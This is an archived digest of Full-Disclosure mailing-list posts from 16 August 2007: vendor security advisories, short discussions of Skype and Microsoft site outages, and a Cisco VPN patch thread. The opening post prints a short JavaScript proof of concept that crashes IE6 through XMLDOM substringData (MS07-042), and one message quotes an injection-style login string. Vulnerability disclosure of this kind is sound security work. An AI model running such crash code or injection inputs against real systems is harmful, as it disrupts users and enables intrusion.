[Full-disclosure] MS07-042 XMLDOM substringData() PoC

2007-08-16 Thread Alla Bezroutchko
This bit of JavaScript kills IE 6 on Windows 2000 and Windows XP SP2: var xmlDoc = new ActiveXObject(Microsoft.XMLDOM); xmlDoc.loadXML(dummy/dummy); var txt = xmlDoc.createTextNode(huh); var out = txt.substringData(1,0x7fff); Installing the patch from MS07-042 fixes it.

[Full-disclosure] Another Oracle Forensics Paper...

2007-08-16 Thread David Litchfield
Hey all, For anyone that's interested I've just posted another paper entitled Oracle Forensics Part 6: Examining Undo Segments, Flashback and the Oracle Recycle Bin. You can get this and other papers on Oracle forensics from http://www.databasesecurity.com/oracle-forensics.htm Cheers, David

[Full-disclosure] FLEA-2007-0046-1 cups

2007-08-16 Thread Foresight Linux Essential Announcement Service
Foresight Linux Essential Advisory: 2007-0046-1 Published: 2007-08-14 Rating: Major Updated Versions: cups=/[EMAIL PROTECTED]:devel//[EMAIL PROTECTED]:1-devel//1/1.2.12-0.2-1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3.2-0.8-2 References:

Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow

2007-08-16 Thread 3APA3A
Dear Joey Mengele, Of course, it's a mitigating factor. But: default PATH_MAX under Linux is 4096, and it's not hard to create a file/folder with a longer path, it's impossible to access it, e.g. folder with path longer than PATH_MAX: bash$ pwd pwd: could not get current directory:

Re: [Full-disclosure] I was browsing the web and noticed this, anyone have an idea?

2007-08-16 Thread James Matthews
Create your own method to accept the password On 8/15/07, d e f c o n [EMAIL PROTECTED] wrote: I am getting an error on my website when I input `--1--` as login and password, how do I patch this and what does this mean? Could I get hacked? Or is this nothing to worry about? defcon

[Full-disclosure] Interesting fun with Cisco VPN Client Privilege Escalation Vulnerabilities

2007-08-16 Thread James Lay
Hey All! So, as an exercise just for giggles, I attempted to get a fix for this. Reference: http://www.cisco.com/warp/public/707/cisco-sa-20070815-vpnclient.shtml As we are just a shop, we do not have a Cisco contract. Here's where the fun starts. From the above: 1. Customers who purchase

[Full-disclosure] [ GLSA 200708-10 ] MySQL: Denial of Service and information leakage

2007-08-16 Thread Raphael Marichez
Gentoo Linux Security Advisory GLSA 200708-10 http://security.gentoo.org/

Re: [Full-disclosure] Interesting fun with Cisco VPN Client Privilege Escalation Vulnerabilities

2007-08-16 Thread J. Oquendo
James Lay wrote: You'll need a LOT more than just the site and serial number...you'll need to be registered with Cisco or provide them with: REQUIRED INFORMATION * CONTACT NAME: * CONTACT PHONE NUMBER: * CONTACT CISCO.COM USERID (if one exists): * CONTACT EMAIL ADDRESS: * CONTRACT #:

Re: [Full-disclosure] Microsoft websites experiencing problems?

2007-08-16 Thread Valdis . Kletnieks
On Thu, 16 Aug 2007 13:05:58 MDT, Joshua Russel said: The Technet Security and MSDN websites are extremely slow from the last couple of days. Are they under DDoS? Probably the self-inflicted one known as Patch Tuesday. This month's was pretty humongous. Freaked some ISPs out:

Re: [Full-disclosure] Microsoft websites experiencing problems?

2007-08-16 Thread James Matthews
Maybe it's an update? On 8/16/07, Joshua Russel [EMAIL PROTECTED] wrote: The Technet Security and MSDN websites are extremely slow from the last couple of days. Are they under DDoS? ___ Full-Disclosure - We believe in it. Charter:

Re: [Full-disclosure] Interesting fun with Cisco VPN Client Privilege Escalation Vulnerabilities

2007-08-16 Thread Steven Adair
I went to the below URL you referenced (http://www.cisco.com/cgi-bin/tablebuild.pl/windows?psrtdcat20e2), logged in, and it works fine for me with a listing of all the clients to download. vpnclient-win-msi-5.0.01.0600-k9.exe VPN Client Software for 2000/XP/Vista - Microsoft Installer

[Full-disclosure] Microsoft websites experiencing problems?

2007-08-16 Thread Joshua Russel
The Technet Security and MSDN websites are extremely slow from the last couple of days. Are they under DDoS?

[Full-disclosure] Skype - the voip company

2007-08-16 Thread Simon Smith
Greetings, Does anyone know any more details about the current skype outage, other than what is being presented on their web-site? It appears that all skype-in telephone numbers are reporting out of service, their downloads are disabled, and login to the service is disabled. Thanks in

[Full-disclosure] [ GLSA 200708-11 ] Lighttpd: Multiple vulnerabilities

2007-08-16 Thread Raphael Marichez
Gentoo Linux Security Advisory GLSA 200708-11 http://security.gentoo.org/

[Full-disclosure] [ GLSA 200708-12 ] Wireshark: Multiple vulnerabilities

2007-08-16 Thread Raphael Marichez
Gentoo Linux Security Advisory GLSA 200708-12 http://security.gentoo.org/

Re: [Full-disclosure] Skype - the voip company

2007-08-16 Thread J.A. Terranson
Yeah. Skype is Out Of Service. -- Yours, J.A. Terranson sysadmin_at_mfn.org 0xBD4A95BF Military force is justified only in self-defense; naked aggression is the province of dictators and rogue states. This is the danger of a new 'pre-emptive first strike' doctrine. Ron Paul On Thu, 16

Re: [Full-disclosure] Skype - the voip company

2007-08-16 Thread Fabian Wenk
Hello Simon Simon Smith wrote: Greetings, Does anyone know any more details about the current skype outage, other than what is being presented on their web-site? It appears that all I guess Problems with Skype login [1] does tell a little bit more. [1]

Re: [Full-disclosure] SecNiche : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability

2007-08-16 Thread Pranay Kanwar
Frankly I now feel that it's not SecNiche's fault entirely, it has got a lot of encouragement from its past invalid and absurd claims. Such as _JWIG Context Dependent Template Calling Denial of Service Vulnerability._ http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3816

[Full-disclosure] iDefense Security Advisory 08.16.07: IBM DB2 Universal Database Multiple Race Condition Vulnerabilities

2007-08-16 Thread iDefense Labs
___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] iDefense Security Advisory 08.16.07: IBM DB2 Universal Database Multiple Race Condition Vulnerabilities

2007-08-16 Thread iDefense Labs
IBM DB2 Universal Database Multiple Race Condition Vulnerabilities iDefense Security Advisory 08.16.07 http://labs.idefense.com/intelligence/vulnerabilities/ Aug 16, 2007 I. BACKGROUND IBM Corp.'s DB2 Universal Database product is a large database server product commonly used for high end

[Full-disclosure] iDefense Security Advisory 08.16.07: IBM DB2 Universal Database Directory Traversal Vulnerability

2007-08-16 Thread iDefense Labs
IBM DB2 Universal Database Directory Traversal Vulnerability iDefense Security Advisory 08.16.07 http://labs.idefense.com/intelligence/vulnerabilities/ Aug 16, 2007 I. BACKGROUND IBM Corp.'s DB2 Universal Database product is a large database server product commonly used for high end databases.

[Full-disclosure] iDefense Security Advisory 08.16.07: IBM DB2 Universal Database Multiple File Creation Vulnerabilities

2007-08-16 Thread iDefense Labs
IBM DB2 Universal Database Multiple File Creation Vulnerabilities iDefense Security Advisory 08.16.07 http://labs.idefense.com/intelligence/vulnerabilities/ Aug 16, 2007 I. BACKGROUND IBM Corp.'s DB2 Universal Database product is a large database server product commonly used for high end

[Full-disclosure] iDefense Security Advisory 08.16.07: IBM DB2 Universal Database Directory Creation Vulnerability

2007-08-16 Thread iDefense Labs
IBM DB2 Universal Database Directory Creation Vulnerability iDefense Security Advisory 08.16.07 http://labs.idefense.com/intelligence/vulnerabilities/ Aug 16, 2007 I. BACKGROUND IBM Corp.'s DB2 Universal Database product is a large database server product commonly used for high end databases.

[Full-disclosure] iDefense Security Advisory 08.16.07: IBM DB2 Universal Database Multiple Untrusted Search Path Vulnerabilities

2007-08-16 Thread iDefense Labs
IBM DB2 Universal Database Multiple Untrusted Search Path Vulnerabilities iDefense Security Advisory 08.16.07 http://labs.idefense.com/intelligence/vulnerabilities/ Aug 16, 2007 I. BACKGROUND IBM Corp.'s DB2 Universal Database product is a large database server product commonly used for high

[Full-disclosure] iDefense Security Advisory 08.16.07: IBM DB2 Universal Database buildDasPaths Buffer Overflow Vulnerability

2007-08-16 Thread iDefense Labs
IBM DB2 Universal Database buildDasPaths Buffer Overflow Vulnerability iDefense Security Advisory 08.16.07 http://labs.idefense.com/intelligence/vulnerabilities/ Aug 16, 2007 I. BACKGROUND IBM Corp.'s DB2 Universal Database product is a large database server product commonly used for high end

Re: [Full-disclosure] Xbox Live Gamertag stolen

2007-08-16 Thread Kevin Finisterre (lists)
Hrmm I am wondering if several people are toying with me or if something is really going on over in Xbox Live support? Well Slavik Plotnikov after posting my information at http://www.digitalmunition.com/StolenUpdate.html and speaking with the media Scott Hirnle ultimately took care of

[Full-disclosure] [USN-499-1] Apache vulnerabilities

2007-08-16 Thread Kees Cook
=== Ubuntu Security Notice USN-499-1 August 16, 2007 apache2 vulnerabilities CVE-2006-5752, CVE-2007-1863, CVE-2007-3304 === A security issue affects the following Ubuntu